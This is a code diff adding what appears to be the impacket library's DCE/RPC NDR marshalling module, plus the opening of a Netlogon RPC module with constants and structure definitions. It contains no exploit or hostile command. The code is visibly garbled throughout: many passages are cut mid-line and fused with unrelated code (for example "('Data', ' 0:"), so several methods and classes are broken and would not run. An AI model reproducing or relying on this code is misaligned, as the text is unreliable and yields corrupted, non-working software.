+ if self['Data'] > 0:
+ print(" TRUE")
+ else:
+ print(" FALSE")
+
+class NDRCHAR(NDR):
+ align = 1
+ structure = (
+ ('Data', 'c'),
+ )
+
+class NDRSHORT(NDR):
+ align = 2
+ structure = (
+ ('Data', ' 0:
+ soFar += pad0
+ arrayPadding = b'\xef'*pad0
+ else:
+ arrayPadding = b''
+ # And now, let's pretend we put the item in
+ soFar += arrayItemSize
+ data = self.fields[fieldName].getData(soFar)
+ data = arrayPadding + pack(arrayPackStr, self.getArrayMaximumSize(fieldName)) + data
+ else:
+ pad = self.calculatePad(fieldTypeOrClass, soFar)
+ if pad > 0:
+ soFar += pad
+ data += b'\xcc'*pad
+
+ data += self.pack(fieldName, fieldTypeOrClass, soFar)
+
+ # Any referent information to pack?
+ if isinstance(self.fields[fieldName], NDRCONSTRUCTEDTYPE):
+ data += self.fields[fieldName].getDataReferents(soFar0 + len(data))
+ data += self.fields[fieldName].getDataReferent(soFar0 + len(data))
+ soFar = soFar0 + len(data)
+
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ return data
+
+ def calcPackSize(self, fieldTypeOrClass, data):
+ if isinstance(fieldTypeOrClass, str) is False:
+ return len(data)
+
+ # array specifier
+ two = fieldTypeOrClass.split('*')
+ if len(two) == 2:
+ answer = 0
+ for each in data:
+ if self.isNDR(self.item):
+ item = ':'
+ else:
+ item = self.item
+ answer += self.calcPackSize(item, each)
+ return answer
+ else:
+ return NDR.calcPackSize(self, fieldTypeOrClass, data)
+
+ def getArrayMaximumSize(self, fieldName):
+ if self.fields[fieldName].fields['MaximumCount'] is not None and self.fields[fieldName].fields['MaximumCount'] > 0:
+ return self.fields[fieldName].fields['MaximumCount']
+ else:
+ return self.fields[fieldName].getArraySize()
+
+ def getArraySize(self, fieldName, data, offset=0):
+ if self._isNDR64:
+ arrayItemSize = 8
+ arrayUnPackStr = ' align:
+ align = tmpAlign
+ return align
+
+ def getData(self, soFar = 0):
+ data = b''
+ soFar0 = soFar
+ for fieldName, fieldTypeOrClass in self.structure:
+ try:
+ if self.isNDR(fieldTypeOrClass) is False:
+ # If the item is not NDR (e.g. ('MaximumCount', ' 0:
+ soFar += pad
+ data += b'\xca'*pad
+
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+ data += res
+ soFar = soFar0 + len(data)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ return data
+
+ def pack(self, fieldName, fieldTypeOrClass, soFar = 0):
+ # array specifier
+ two = fieldTypeOrClass.split('*')
+ if len(two) == 2:
+ answer = b''
+ if self.isNDR(self.item):
+ item = ':'
+ dataClass = self.item
+ self.fields['_tmpItem'] = dataClass(isNDR64=self._isNDR64)
+ else:
+ item = self.item
+ dataClass = None
+ self.fields['_tmpItem'] = item
+
+ for each in (self.fields[fieldName]):
+ pad = self.calculatePad(self.item, len(answer)+soFar)
+ if pad > 0:
+ answer += b'\xdd' * pad
+ if dataClass is None:
+ if item == 'c' and PY3 and isinstance(each, int):
+ # Special case when dealing with PY3, here we have an integer we need to convert
+ each = bytes([each])
+ answer += pack(item, each)
+ else:
+ answer += each.getData(len(answer)+soFar)
+
+ if dataClass is not None:
+ for each in self.fields[fieldName]:
+ if isinstance(each, NDRCONSTRUCTEDTYPE):
+ answer += each.getDataReferents(len(answer)+soFar)
+ answer += each.getDataReferent(len(answer)+soFar)
+
+ del(self.fields['_tmpItem'])
+ if isinstance(self, NDRUniConformantArray) or isinstance(self, NDRUniConformantVaryingArray):
+ # First field points to a field with the amount of items
+ self.setArraySize(len(self.fields[fieldName]))
+ else:
+ self.fields[two[1]] = len(self.fields[fieldName])
+
+ return answer
+ else:
+ return NDRCONSTRUCTEDTYPE.pack(self, fieldName, fieldTypeOrClass, soFar)
+
+ def fromString(self, data, offset=0):
+ offset0 = offset
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:
+ try:
+ if self.isNDR(fieldTypeOrClass) is False:
+ # If the item is not NDR (e.g. ('MaximumCount', ' 0:
+ soFarItems +=pad
+ if dataClassOrCode is None:
+ nsofar = soFarItems + calcsize(item)
+ answer.append(unpack_from(item, data, offset+soFarItems)[0])
+ else:
+ itemn = dataClassOrCode(isNDR64=self._isNDR64)
+ size = itemn.fromString(data, offset+soFarItems)
+ answer.append(itemn)
+ nsofar += size + pad
+ numItems -= 1
+ soFarItems = nsofar
+
+ if dataClassOrCode is not None and isinstance(dataClassOrCode(), NDRCONSTRUCTEDTYPE):
+ # We gotta go over again, asking for the referents
+ answer2 = []
+ for itemn in answer:
+ size = itemn.fromStringReferents(data, soFarItems+offset)
+ soFarItems += size
+ size = itemn.fromStringReferent(data, soFarItems+offset)
+ soFarItems += size
+ answer2.append(itemn)
+ answer = answer2
+ del answer2
+
+ del(self.fields['_tmpItem'])
+
+ self.fields[fieldName] = answer
+ return soFarItems + offset - offset0
+ else:
+ return NDRCONSTRUCTEDTYPE.unpack(self, fieldName, fieldTypeOrClass, data, offset)
+
+class NDRUniFixedArray(NDRArray):
+ structure = (
+ ('Data',':'),
+ )
+
+# Uni-dimensional Conformant Arrays
+class NDRUniConformantArray(NDRArray):
+ item = 'c'
+ structure = (
+ #('MaximumCount', ' 0:
+ soFar += pad
+ data += b'\xcb'*pad
+
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+ data += res
+ soFar = soFar0 + len(data)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ return data
+
+# Multidimensional arrays not implemented for now
+
+# Varying Strings
+class NDRVaryingString(NDRUniVaryingArray):
+ def getData(self, soFar = 0):
+ # The last element of a string is a terminator of the same size as the other elements.
+ # If the string element size is one octet, the terminator is a NULL character.
+ # The terminator for a string of multi-byte characters is the array element zero (0).
+ if self["Data"][-1:] != b'\x00':
+ if PY3 and isinstance(self["Data"],list) is False:
+ self["Data"] = self["Data"] + b'\x00'
+ else:
+ self["Data"] = b''.join(self["Data"]) + b'\x00'
+ return NDRUniVaryingArray.getData(self, soFar)
+
+ def fromString(self, data, offset = 0):
+ ret = NDRUniVaryingArray.fromString(self, data, offset)
+ # Let's take out the last item
+ self["Data"] = self["Data"][:-1]
+ return ret
+
+# Conformant and Varying Strings
+class NDRConformantVaryingString(NDRUniConformantVaryingArray):
+ pass
+
+# Structures
+# Structures Containing a Conformant Array
+# Structures Containing a Conformant and Varying Array
+class NDRSTRUCT(NDRCONSTRUCTEDTYPE):
+ def getData(self, soFar = 0):
+ data = b''
+ arrayPadding = b''
+ soFar0 = soFar
+ # 14.3.7.1 Structures Containing a Conformant Array
+ # A structure can contain a conformant array only as its last member.
+ # In the NDR representation of a structure that contains a conformant array,
+ # the unsigned long integers that give maximum element counts for dimensions of the array
+ # are moved to the beginning of the structure, and the array elements appear in place at
+ # the end of the structure.
+ # 14.3.7.2 Structures Containing a Conformant and Varying Array
+ # A structure can contain a conformant and varying array only as its last member.
+ # In the NDR representation of a structure that contains a conformant and varying array,
+ # the maximum counts for dimensions of the array are moved to the beginning of the structure,
+ # but the offsets and actual counts remain in place at the end of the structure,
+ # immediately preceding the array elements
+ lastItem = (self.commonHdr+self.structure)[-1][0]
+ if isinstance(self.fields[lastItem], NDRUniConformantArray) or isinstance(self.fields[lastItem], NDRUniConformantVaryingArray):
+ # So we have an array, first item in the structure must be the array size, although we
+ # will need to build it later.
+ if self._isNDR64:
+ arrayItemSize = 8
+ arrayPackStr = ' 0:
+ soFar += pad0
+ arrayPadding = b'\xee'*pad0
+ else:
+ arrayPadding = b''
+ # And now, let's pretend we put the item in
+ soFar += arrayItemSize
+ else:
+ arrayItemSize = 0
+
+ # Now we need to align the structure
+ # The alignment of a structure in the octet stream is the largest of the alignments of the fields it
+ # contains. These fields may also be constructed types. The same alignment rules apply
+ # recursively to nested constructed types.
+ alignment = self.getAlignment()
+
+ if alignment > 0:
+ pad = (alignment - (soFar % alignment)) % alignment
+ if pad > 0:
+ soFar += pad
+ data += b'\xAB'*pad
+
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:
+ try:
+ if isinstance(self.fields[fieldName], NDRUniConformantArray) or isinstance(self.fields[fieldName], NDRUniConformantVaryingArray):
+ res = self.fields[fieldName].getData(soFar)
+ if isinstance(self, NDRPOINTER):
+ pointerData = data[:arrayItemSize]
+ data = data[arrayItemSize:]
+ data = pointerData + arrayPadding + pack(arrayPackStr ,self.getArrayMaximumSize(fieldName)) + data
+ else:
+ data = arrayPadding + pack(arrayPackStr, self.getArrayMaximumSize(fieldName)) + data
+ arrayPadding = b''
+ arrayItemSize = 0
+ else:
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+ data += res
+ soFar = soFar0 + len(data) + len(arrayPadding) + arrayItemSize
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ # 2.2.5.3.4.1 Structure with Trailing Gap
+ # NDR64 represents a structure as an ordered sequence of representations of the
+ # structure members. The trailing gap from the last nonconformant and nonvarying
+ # field to the alignment of the structure MUST be represented as a trailing pad.
+ # The size of the structure MUST be a multiple of its alignment.
+ # See the following figure.
+
+ # 4.8 Example of Structure with Trailing Gap in NDR64
+ # This example shows a structure with a trailing gap in NDR64.
+ # typedef struct _StructWithPad
+ # {
+ # long l;
+ # short s;
+ # } StructWithPad;
+ # The size of the structure in the octet stream MUST contain a 2-byte trailing
+ # gap to make its size 8, a multiple of the structure's alignment, 4.
+# if self._isNDR64 is True:
+# # ToDo add trailing gap here
+# if alignment > 0:
+# pad = (alignment - (soFar % alignment)) % alignment
+# if pad > 0:
+# soFar += pad
+# data += '\xcd'*pad
+# print self.__class__ , alignment, pad, hex(soFar)
+ return data
+
+ def fromString(self, data, offset = 0 ):
+ offset0 = offset
+ # 14.3.7.1 Structures Containing a Conformant Array
+ # A structure can contain a conformant array only as its last member.
+ # In the NDR representation of a structure that contains a conformant array,
+ # the unsigned long integers that give maximum element counts for dimensions of the array
+ # are moved to the beginning of the structure, and the array elements appear in place at
+ # the end of the structure.
+ # 14.3.7.2 Structures Containing a Conformant and Varying Array
+ # A structure can contain a conformant and varying array only as its last member.
+ # In the NDR representation of a structure that contains a conformant and varying array,
+ # the maximum counts for dimensions of the array are moved to the beginning of the structure,
+ # but the offsets and actual counts remain in place at the end of the structure,
+ # immediately preceding the array elements
+ lastItem = (self.commonHdr+self.structure)[-1][0]
+
+ # If it's a pointer, let's parse it here because
+ # we are going to parse the next MaximumCount field(s) manually
+ # when it's a Conformant or Conformant and Varying array
+ if isinstance(self, NDRPOINTER):
+ structureFields = self.structure
+
+ alignment = self.getAlignment()
+ if alignment > 0:
+ offset += (alignment - (offset % alignment)) % alignment
+
+ for fieldName, fieldTypeOrClass in self.commonHdr:
+ offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)
+ else:
+ structureFields = self.commonHdr+self.structure
+
+ if isinstance(self.fields[lastItem], NDRUniConformantArray) or isinstance(self.fields[lastItem], NDRUniConformantVaryingArray):
+ # So we have an array, first item in the structure must be the array size, although we
+ # will need to build it later.
+ if self._isNDR64:
+ arrayItemSize = 8
+ arrayUnPackStr = ' 0:
+ offset += (alignment - (offset % alignment)) % alignment
+
+ for fieldName, fieldTypeOrClass in structureFields:
+ try:
+ offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error unpacking field '%s | %s | %r'" % (fieldName, fieldTypeOrClass, data[offset:offset+256]))
+ raise
+
+ return offset - offset0
+
+ def getAlignment(self):
+ # Alignment of Constructed Types
+ #
+ # NDR enforces NDR alignment of structured data. As with primitive data types, an alignment, n, is determined
+ # for the structure. Where necessary, an alignment gap of octets of unspecified value precedes the data in
+ # the NDR octet stream. This gap is the smallest size sufficient to align the first field of the structure
+ # on an NDR octet stream index of n.
+
+ # The rules for calculating the alignment of constructed types are as follows:
+
+ # 1) If a conformant structure-that is, a conformant or conformant varying array, or a structure containing
+ # a conformant or conformant varying array-is embedded in the constructed type, and is the outermost
+ # structure-that is, is not contained in another structure-then the size information from the contained
+ # conformant structure is positioned so that it precedes both the containing constructed type and any
+ # alignment gap for the constructed type. (See Section 14.3.7 for information about structures containing
+ # arrays.) The size information is itself aligned according to the alignment rules for primitive data
+ # types. (See Section 14.2.2 on page 620.) The data of the constructed type is then aligned according to
+ # the alignment rules for the constructed type. In other words, the size information precedes the structure
+ # and is aligned independently of the structure alignment.
+
+ # 2) The alignment of a structure in the octet stream is the largest of the alignments of the fields it
+ # contains. These fields may also be constructed types. The same alignment rules apply recursively to nested
+ # constructed types.
+
+ align = 0
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
+ if isinstance(self.fields[fieldName], NDR):
+ tmpAlign = self.fields[fieldName].getAlignment()
+ else:
+ tmpAlign = self.calcPackSize(fieldTypeOrClass, b'')
+ if tmpAlign > align:
+ align = tmpAlign
+ return align
+
+# Unions
+class NDRUNION(NDRCONSTRUCTEDTYPE):
+ commonHdr = (
+ ('tag', NDRUSHORT),
+ )
+ commonHdr64 = (
+ ('tag', NDRULONG),
+ )
+
+ union = {
+ # For example
+ #1: ('pStatusChangeParam1', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1),
+ #2: ('pStatusChangeParams', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2),
+ }
+ def __init__(self, data = None, isNDR64=False, topLevel = False):
+ #ret = NDR.__init__(self,None, isNDR64=isNDR64)
+ self.topLevel = topLevel
+ self._isNDR64 = isNDR64
+ self.fields = {}
+
+ if isNDR64 is True:
+ if self.commonHdr64 != ():
+ self.commonHdr = self.commonHdr64
+ if self.structure64 != ():
+ self.structure = self.structure64
+ if hasattr(self, 'align64'):
+ self.align = self.align64
+
+ for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
+ if self.isNDR(fieldTypeOrClass):
+ if self.isPointer(fieldTypeOrClass):
+ self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64, topLevel = topLevel)
+ elif self.isUnion(fieldTypeOrClass):
+ self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64, topLevel = topLevel)
+ else:
+ self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
+ elif fieldTypeOrClass == ':':
+ self.fields[fieldName] = None
+ elif len(fieldTypeOrClass.split('=')) == 2:
+ try:
+ self.fields[fieldName] = eval(fieldTypeOrClass.split('=')[1])
+ except:
+ self.fields[fieldName] = None
+ else:
+ self.fields[fieldName] = 0
+
+ if data is not None:
+ self.fromString(data)
+
+ def __setitem__(self, key, value):
+ if key == 'tag':
+ # We're writing the tag, we now should set the right item for the structure
+ self.structure = ()
+ if value in self.union:
+ self.structure = (self.union[value]),
+ # Init again the structure
+ self.__init__(None, isNDR64=self._isNDR64, topLevel = self.topLevel)
+ self.fields['tag']['Data'] = value
+ else:
+ # Let's see if we have a default value
+ if 'default' in self.union:
+ if self.union['default'] is None:
+ self.structure = ()
+ else:
+ self.structure = (self.union['default']),
+ # Init again the structure
+ self.__init__(None, isNDR64=self._isNDR64, topLevel = self.topLevel)
+ self.fields['tag']['Data'] = 0xffff
+ else:
+ raise Exception("Unknown tag %d for union!" % value)
+ else:
+ return NDRCONSTRUCTEDTYPE.__setitem__(self,key,value)
+
+ def getData(self, soFar = 0):
+ data = b''
+ soFar0 = soFar
+
+ # Let's align ourselves
+ alignment = self.getAlignment()
+ if alignment > 0:
+ pad = (alignment - (soFar % alignment)) % alignment
+ else:
+ pad = 0
+ if pad > 0:
+ soFar += pad
+ data += b'\xbc'*pad
+
+ for fieldName, fieldTypeOrClass in self.commonHdr:
+ try:
+ pad = self.calculatePad(fieldTypeOrClass, soFar)
+ if pad > 0:
+ soFar += pad
+ data += b'\xbb'*pad
+
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+ data += res
+ soFar = soFar0 + len(data)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ # WARNING
+ # Now we need to align what's coming next.
+ # This doesn't come from the documentation but from seeing the packets in the wire
+ # for some reason, even if the next field is a SHORT, it should be aligned to
+ # a DWORD, or HYPER if NDR64.
+ if self._isNDR64:
+ align = 8
+ else:
+ if hasattr(self, 'notAlign'):
+ align = 1
+ else:
+ align = 4
+
+ pad = (align - (soFar % align)) % align
+ if pad > 0:
+ data += b'\xbd'*pad
+ soFar += pad
+
+ if self.structure == ():
+ return data
+
+ for fieldName, fieldTypeOrClass in self.structure:
+ try:
+ pad = self.calculatePad(fieldTypeOrClass, soFar)
+ if pad > 0:
+ soFar += pad
+ data += b'\xbe'*pad
+
+ res = self.pack(fieldName, fieldTypeOrClass, soFar)
+ data += res
+ soFar = soFar0 + len(data)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__))
+ raise
+
+ return data
+
+ def fromString(self, data, offset=0):
+ offset0 = offset
+ # Let's align ourselves
+ alignment = self.getAlignment()
+ if alignment > 0:
+ pad = (alignment - (offset % alignment)) % alignment
+ else:
+ pad = 0
+ if pad > 0:
+ offset += pad
+
+ if len(data)-offset > 4:
+ # First off, let's see what the tag is:
+ # We need to know the tag type and unpack it
+ tagtype = self.commonHdr[0][1].structure[0][1].split('=')[0]
+ tag = unpack_from(tagtype, data, offset)[0]
+ if tag in self.union:
+ self.structure = (self.union[tag]),
+ self.__init__(None, isNDR64=self._isNDR64, topLevel = self.topLevel)
+ else:
+ # Let's see if we have a default value
+ if 'default' in self.union:
+ if self.union['default'] is None:
+ self.structure = ()
+ else:
+ self.structure = (self.union['default']),
+ # Init again the structure
+ self.__init__(None, isNDR64=self._isNDR64, topLevel = self.topLevel)
+ self.fields['tag']['Data'] = 0xffff
+ else:
+ raise Exception("Unknown tag %d for union!" % tag)
+
+ for fieldName, fieldTypeOrClass in self.commonHdr:
+ try:
+ offset += self.calculatePad(fieldTypeOrClass, offset)
+ offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error unpacking field '%s | %s | %r'" % (fieldName, fieldTypeOrClass, data[offset:offset+256]))
+ raise
+
+ # WARNING
+ # Now we need to align what's coming next.
+ # This doesn't come from the documentation but from seeing the packets in the wire
+ # for some reason, even if the next field is a SHORT, it should be aligned to
+ # a DWORD, or HYPER if NDR64.
+ if self._isNDR64:
+ align = 8
+ else:
+ if hasattr(self, 'notAlign'):
+ align = 1
+ else:
+ align = 4
+
+ offset += (align - (offset % align)) % align
+
+ if self.structure == ():
+ return offset-offset0
+
+ for fieldName, fieldTypeOrClass in self.structure:
+ try:
+ offset += self.calculatePad(fieldTypeOrClass, offset)
+ offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)
+ except Exception as e:
+ LOG.error(str(e))
+ LOG.error("Error unpacking field '%s | %s | %r'" % (fieldName, fieldTypeOrClass, data[offset:offset+256]))
+ raise
+
+ return offset - offset0
+
+ def getAlignment(self):
+ # Union alignment is the largest alignment of the union discriminator
+ # and all of the union arms.
+ # WRONG, I'm calculating it just with the tag, if I do it with the
+ # arms I get bad stub data. Something wrong I'm doing or the standard
+ # is wrong (most probably it's me :s )
+ align = 0
+ if self._isNDR64:
+ fields = self.commonHdr+self.structure
+ else:
+ fields = self.commonHdr
+ for fieldName, fieldTypeOrClass in fields:
+ if isinstance(self.fields[fieldName], NDR):
+ tmpAlign = self.fields[fieldName].getAlignment()
+ else:
+ tmpAlign = self.calcPackSize(fieldTypeOrClass, b'')
+ if tmpAlign > align:
+ align = tmpAlign
+
+ if self._isNDR64:
+ for fieldName, fieldTypeOrClass in self.union.values():
+ tmpAlign = fieldTypeOrClass(isNDR64 = self._isNDR64).getAlignment()
+ if tmpAlign > align:
+ align = tmpAlign
+ return align
+
+# Pipes not implemented for now
+
+# Pointers
+class NDRPOINTERNULL(NDR):
+ align = 4
+ align64 = 8
+ structure = (
+ ('Data', ' 0:
+ soFar += pad
+ data = b'\xaa'*pad
+ # If we have a ReferentID == 0, means there's no data
+ if self.fields['ReferentID'] == 0:
+ if len(self.referent) > 0:
+ self['Data'] = b''
+ else:
+ if self._isNDR64 is True:
+ return data+b'\x00'*8
+ else:
+ return data+b'\x00'*4
+
+ return data + NDRSTRUCT.getData(self, soFar)
+
+ def fromString(self, data, offset=0):
+ # First of all we need to align ourselves
+ pad = self.calculatePad(self.commonHdr[0][1], offset)
+ offset += pad
+
+ # Do we have a Referent ID == 0?
+ if self._isNDR64 is True:
+ unpackStr = ' 0:
+ soFar += pad
+ data += b'\xab'*pad
+
+ # Are we dealing with an array?
+ if isinstance(self.fields[fieldName], NDRUniConformantArray) or isinstance(self.fields[fieldName],
+ NDRUniConformantVaryingArray):
+ # Align size item
+ if self._isNDR64:
+ pad = (8 - (soFar % 8)) % 8
+ else:
+ pad = (4 - (soFar % 4)) % 4
+ # Pack the item
+ res = self.pack(fieldName, fieldTypeOrClass, soFar+pad)
+ # Yes, get the array size
+ arraySize = self.getArrayMaximumSize(fieldName)
+ if self._isNDR64:
+ pad = (8 - (soFar % 8)) % 8
+ data += b'\xce'*pad + pack('.
+# There are test cases for them too.
+#
+from struct import pack
+from six import b
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
+ NDRUniFixedArray, NDRUniConformantVaryingArray
+from impacket.dcerpc.v5.dtypes import WSTR, LPWSTR, DWORD, ULONG, USHORT, PGUID, NTSTATUS, NULL, LONG, UCHAR, PRPC_SID, \
+ GUID, RPC_UNICODE_STRING, SECURITY_INFORMATION, LPULONG
+from impacket import system_errors, nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.samr import OLD_LARGE_INTEGER
+from impacket.dcerpc.v5.lsad import PLSA_FOREST_TRUST_INFORMATION
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.structure import Structure
+from impacket import ntlm, crypto, LOG
+import hmac
+import hashlib
+try:
+ from Cryptodome.Cipher import DES, AES, ARC4
+except ImportError:
+ LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
+ LOG.critical("See https://pypi.org/project/pycryptodomex/")
+
+MSRPC_UUID_NRPC = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'NRPC SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ elif key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'NRPC SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'NRPC SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.2.5 NL_DNS_NAME_INFO
+# Type
+NlDnsLdapAtSite = 22
+NlDnsGcAtSite = 25
+NlDnsDsaCname = 28
+NlDnsKdcAtSite = 30
+NlDnsDcAtSite = 32
+NlDnsRfc1510KdcAtSite = 34
+NlDnsGenericGcAtSite = 36
+
+# DnsDomainInfoType
+NlDnsDomainName = 1
+NlDnsDomainNameAlias = 2
+NlDnsForestName = 3
+NlDnsForestNameAlias = 4
+NlDnsNdncDomainName = 5
+NlDnsRecordName = 6
+
+# 2.2.1.3.15 NL_OSVERSIONINFO_V1
+# wSuiteMask
+VER_SUITE_BACKOFFICE = 0x00000004
+VER_SUITE_BLADE = 0x00000400
+VER_SUITE_COMPUTE_SERVER = 0x00004000
+VER_SUITE_DATACENTER = 0x00000080
+VER_SUITE_ENTERPRISE = 0x00000002
+VER_SUITE_EMBEDDEDNT = 0x00000040
+VER_SUITE_PERSONAL = 0x00000200
+VER_SUITE_SINGLEUSERTS = 0x00000100
+VER_SUITE_SMALLBUSINESS = 0x00000001
+VER_SUITE_SMALLBUSINESS_RESTRICTED = 0x00000020
+VER_SUITE_STORAGE_SERVER = 0x00002000
+VER_SUITE_TERMINAL = 0x00000010
+
+# wProductType
+VER_NT_DOMAIN_CONTROLLER = 0x00000002
+VER_NT_SERVER = 0x00000003
+VER_NT_WORKSTATION = 0x00000001
+
+# 2.2.1.4.18 NETLOGON Specific Access Masks
+NETLOGON_UAS_LOGON_ACCESS = 0x0001
+NETLOGON_UAS_LOGOFF_ACCESS = 0x0002
+NETLOGON_CONTROL_ACCESS = 0x0004
+NETLOGON_QUERY_ACCESS = 0x0008
+NETLOGON_SERVICE_ACCESS = 0x0010
+NETLOGON_FTINFO_ACCESS = 0x0020
+NETLOGON_WKSTA_RPC_ACCESS = 0x0040
+
+# 3.5.4.9.1 NetrLogonControl2Ex (Opnum 18)
+# FunctionCode
+NETLOGON_CONTROL_QUERY = 0x00000001
+NETLOGON_CONTROL_REPLICATE = 0x00000002
+NETLOGON_CONTROL_SYNCHRONIZE = 0x00000003
+NETLOGON_CONTROL_PDC_REPLICATE = 0x00000004
+NETLOGON_CONTROL_REDISCOVER = 0x00000005
+NETLOGON_CONTROL_TC_QUERY = 0x00000006
+NETLOGON_CONTROL_TRANSPORT_NOTIFY = 0x00000007
+NETLOGON_CONTROL_FIND_USER = 0x00000008
+NETLOGON_CONTROL_CHANGE_PASSWORD = 0x00000009
+NETLOGON_CONTROL_TC_VERIFY = 0x0000000A
+NETLOGON_CONTROL_FORCE_DNS_REG = 0x0000000B
+NETLOGON_CONTROL_QUERY_DNS_REG = 0x0000000C
+NETLOGON_CONTROL_BACKUP_CHANGE_LOG = 0x0000FFFC
+NETLOGON_CONTROL_TRUNCATE_LOG = 0x0000FFFD
+NETLOGON_CONTROL_SET_DBFLAG = 0x0000FFFE
+NETLOGON_CONTROL_BREAKPOINT = 0x0000FFFF
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 3.5.4.1 RPC Binding Handles for Netlogon Methods
+LOGONSRV_HANDLE = WSTR
+PLOGONSRV_HANDLE = LPWSTR
+
+# 2.2.1.1.1 CYPHER_BLOCK
+class CYPHER_BLOCK(NDRSTRUCT):
+ structure = (
+ ('Data', '8s=b""'),
+ )
+ def getAlignment(self):
+ return 1
+
+NET_API_STATUS = DWORD
+
+# 2.2.1.1.2 STRING
+from impacket.dcerpc.v5.lsad import STRING
+
+# 2.2.1.1.3 LM_OWF_PASSWORD
+class CYPHER_BLOCK_ARRAY(NDRUniFixedArray):
+ def getDataLen(self, data, offset=0):
+ return len(CYPHER_BLOCK())*2
+
+class LM_OWF_PASSWORD(NDRSTRUCT):
+ structure = (
+ ('Data', CYPHER_BLOCK_ARRAY),
+ )
+
+# 2.2.1.1.4 NT_OWF_PASSWORD
+NT_OWF_PASSWORD = LM_OWF_PASSWORD
+ENCRYPTED_NT_OWF_PASSWORD = NT_OWF_PASSWORD
+
+# 2.2.1.3.4 NETLOGON_CREDENTIAL
+class UCHAR_FIXED_ARRAY(NDRUniFixedArray):
+ align = 1
+ def getDataLen(self, data, offset=0):
+ return len(CYPHER_BLOCK())
+
+class NETLOGON_CREDENTIAL(NDRSTRUCT):
+ structure = (
+ ('Data',UCHAR_FIXED_ARRAY),
+ )
+ def getAlignment(self):
+ return 1
+
+# 2.2.1.1.5 NETLOGON_AUTHENTICATOR
+class NETLOGON_AUTHENTICATOR(NDRSTRUCT):
+ structure = (
+ ('Credential', NETLOGON_CREDENTIAL),
+ ('Timestamp', DWORD),
+ )
+
+class PNETLOGON_AUTHENTICATOR(NDRPOINTER):
+ referent = (
+ ('Data', NETLOGON_AUTHENTICATOR),
+ )
+
+# 2.2.1.2.1 DOMAIN_CONTROLLER_INFOW
+class DOMAIN_CONTROLLER_INFOW(NDRSTRUCT):
+ structure = (
+ ('DomainControllerName', LPWSTR),
+ ('DomainControllerAddress', LPWSTR),
+ ('DomainControllerAddressType', ULONG),
+ ('DomainGuid', GUID),
+ ('DomainName', LPWSTR),
+ ('DnsForestName', LPWSTR),
+ ('Flags', ULONG),
+ ('DcSiteName', LPWSTR),
+ ('ClientSiteName', LPWSTR),
+ )
+
+class PDOMAIN_CONTROLLER_INFOW(NDRPOINTER):
+ referent = (
+ ('Data', DOMAIN_CONTROLLER_INFOW),
+ )
+
+# 2.2.1.2.2 NL_SITE_NAME_ARRAY
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+ item = RPC_UNICODE_STRING
+
+class PRPC_UNICODE_STRING_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', RPC_UNICODE_STRING_ARRAY),
+ )
+
+class NL_SITE_NAME_ARRAY(NDRSTRUCT):
+ structure = (
+ ('EntryCount', ULONG),
+ ('SiteNames', PRPC_UNICODE_STRING_ARRAY),
+ )
+
+class PNL_SITE_NAME_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', NL_SITE_NAME_ARRAY),
+ )
+
+# 2.2.1.2.3 NL_SITE_NAME_EX_ARRAY
